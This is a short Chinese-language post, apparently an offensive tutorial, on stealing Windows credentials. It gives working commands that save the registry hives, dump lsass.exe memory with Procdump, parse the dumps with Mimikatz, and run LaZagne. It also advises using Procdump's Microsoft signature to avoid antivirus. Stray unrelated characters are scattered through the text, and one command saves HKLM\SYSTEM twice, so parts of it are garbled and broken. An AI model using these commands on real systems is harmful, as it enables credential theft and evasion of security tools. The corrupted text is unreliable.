Mimikatz
Mimikatz又被稱為法國(guó)大面包蛔六,是一款windows平臺(tái)的神器帕胆,他最顯著的功能就是從lsass.exe中抓取密碼朝捆,此外它還可以用于提權(quán)、注入進(jìn)程懒豹,讀取進(jìn)程內(nèi)存等操作芙盘。但是Mimikatz沒(méi)有經(jīng)過(guò)處理直接扔到服務(wù)器上,200%會(huì)被殺軟殺掉脸秽。因此儒老,我們需要通過(guò)別的手段去抓取數(shù)據(jù)到本地。
通過(guò)注冊(cè)表抓取
獲取注冊(cè)表中的信息:
執(zhí)行這兩條命令需要管理員權(quán)限reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv reg save HKLM\SYSTEM c:\windows\temp\Sam.hiv
把這兩個(gè)文件拉取到本地记餐,執(zhí)行命令:
mimikatz "lsadump::sam /sam:Sam.hiv /system:Sys.hiv" exit
lsass.exe內(nèi)存抓取
如果有一些賬號(hào)登錄本機(jī)驮樊,如域管理員等,這些登錄信息會(huì)被儲(chǔ)存在lsass.exe這個(gè)進(jìn)程中片酝,通過(guò)內(nèi)存抓取可以獲得這些信息囚衔。
用到的工具:Procdump,此工具有微軟的官方簽名雕沿,大部分的殺軟都不會(huì)查殺
下載地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/
將對(duì)應(yīng)的Procdump上傳到服務(wù)器中练湿,執(zhí)行procdump64.exe -accepteula -ma lsass.exe lsass.dmp
將生成的dmp文件拉到本地,執(zhí)行命令
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit在windows 2008前密碼都是明文存儲(chǔ)审轮,在2008之后系統(tǒng)會(huì)進(jìn)行hash加密再存儲(chǔ)
LaZagne
下載地址 http://github.com/AlessandroZ/LaZagne
下載源碼肥哎,并按照github上的說(shuō)明安裝一些模塊辽俗,在python3下的環(huán)境運(yùn)行python3 laZagne.py allLaZagne可以抓取多種在計(jì)算機(jī)中儲(chǔ)存的密碼,如vnc篡诽、瀏覽器存儲(chǔ)的密碼榆苞、數(shù)據(jù)庫(kù)密碼、Hashdump等霞捡。
